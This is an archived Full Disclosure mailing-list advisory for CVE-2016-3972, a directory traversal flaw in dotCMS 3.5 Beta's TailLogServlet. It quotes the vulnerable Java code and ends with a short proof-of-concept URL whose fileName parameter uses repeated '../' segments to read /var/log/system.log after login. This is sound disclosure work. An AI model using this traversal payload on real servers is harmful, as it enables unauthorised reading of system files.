| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 8 Apr 2016 11:07:35 +0800
From: xiong piaox <yahoo860201@...il.com>
To: fulldisclosure@...lists.org
Cc: oss-security@...ts.openwall.com, bugs@...uritytracker.com,
bugtraq@...urityfocus.com
Subject: [FD] [CVE-2016-3972]DotCMS Directory traversal vulnerability
Advisory: DotCMS Directory traversal vulnerability
Author: Piaox From Pingan Product Safety Group
Email: xiongyaofu351@...gan.com.cn
Affected Version: dotCMS 3.5 Beta(the latest version)
==========================
Vulnerability Description
Recetly, I found a Directory traversal vulnerability in ‘DotCMS'
program, DotCMS is widely used in many companies.
Vulnerable file is: “com.dotmarketing.servlets.taillog.TailLogServlet.class”
File file = *null*;
String tailLogLofFolder = *Config*.*getStringProperty*(
"TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/");
*try*
{
*if* (!tailLogLofFolder.endsWith(File.separator)) {
tailLogLofFolder = tailLogLofFolder + File.separator;
}
file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder +
fileName));
}
*catch* (Exception e)
{
*Logger*.*error*(getClass(), "unable to open log file '" +
tailLogLofFolder + fileName + "' please set the config variable
TAIL_LOG_LOG_FOLDER correctly");
}
*if* ((file == *null*) || (!file.exists()))
{
response.sendError(403);
*AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone
tried to use the TailLogServlet to display a file not in the logs directory"
);
*return*;
}
String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX");
//WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$
*if* (!*UtilMethods*.*isSet*(regex)) {
regex = "!.*";
}
*if* (!Pattern.compile(regex).matcher(fileName).matches()) {
//Only detects whether the file extension .log end,lead ,caused Directory
traversal vulnerability.
*return*;
}
response.setContentType("text/html;charset=UTF-8");
ServletOutputStream out = response.getOutputStream();
out.print("<html><head><title>dotCMS Log</title><style
type='text/css'>@import '/html/css/dot_admin.css';</style><script>var
working =false;function
doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body
class='tailerBody'>");
out.flush();
*Tailer* tailer = *null*;
*long* startPosition = file.length() - 5000L < 0L ? 0L : file.length()
- 5000L;
*MyTailerListener* listener = *new* MyTailerListener(*null*);
listener.*handle*("Tailing " + fileName);
listener.*handle*("----------------------------- ");
tailer = *new* *Tailer*(file, listener, 1000L);
tailer.*setStartPosition*(startPosition);
*MyTailerThread* thread = *new* *MyTailerThread*(tailer);
String name = *null*;
*for* (*int* i = 0; i < 1000; i++)
{
name = "LogTailer" + i + ":" + fileName;
Thread t = *ThreadUtils*.*getThread*(name);
*if* (t == *null*) {
*break*;
}
*if* (i > 100) {
*throw* *new* ServletException("Too many Logger threads");
}
}
==========================
POC && EXP
==========================
1. Login
2.
http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists